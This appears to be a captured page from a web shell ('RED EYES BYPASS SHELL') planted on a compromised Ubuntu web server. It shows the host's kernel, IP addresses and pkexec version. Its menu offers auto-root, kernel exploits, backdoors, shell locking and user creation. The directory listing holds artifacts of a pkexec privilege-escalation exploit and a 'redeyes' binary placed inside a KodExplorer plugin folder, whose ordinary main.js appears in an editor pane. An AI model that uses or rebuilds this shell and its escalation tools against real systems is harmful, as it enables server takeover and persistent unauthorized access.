Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
user /
plugins /
zipView /
static /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
.red_eyes_root
0
B
-rw-r--r--
main.js
1.18
KB
-rw-r--r--
page.js
3.22
KB
-rw-r--r--
redeyes
10.99
KB
-rwxr-xr-x
zipView.js
17.86
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : main.js
kodReady.push(function(){ var apiView = function(){ var url = '{{pluginApi}}unzipList&accessToken='+G.accessToken if (typeof(G.sid) != 'undefined') { url = '{{pluginApi}}unzipList&user='+G.user+'&sid='+G.sid; } return url; } //测试 替换分享链接地址; // Hook.bind('explorer.path.share.uiInitStart',function(){ // G.appHostTemp = G.appHost; // G.appHost = "http://test.com/"; // console.log(G.appHost); // }); // Hook.bind('explorer.path.share.uiInit',function(){ // G.appHost = G.appHostTemp; // }); kodApp.add({ name:"zipView", title:"{{LNG.Plugin.default.zipView}}", ext:"{{config.fileExt}}", sort:"{{config.fileSort}}", icon:"{{pluginHost}}static/images/icon.png", callback:function(path,ext){ //分享内容暂不支持查看内容 if (typeof(G.sharePage) != 'undefined' && G.sid) { kodApp.openUnknow(path); return; } var appOption = { filePath:path, apiUnzip:G.appHost+"explorer/unzip", apiList:apiView() } require.async([ 'lib/ztree/ztree', '{{pluginHost}}static/zipView.js' ],function(tree,zipView){ new zipView(appOption); }); } }); require.async('{{pluginHost}}static/page.js'); });
Close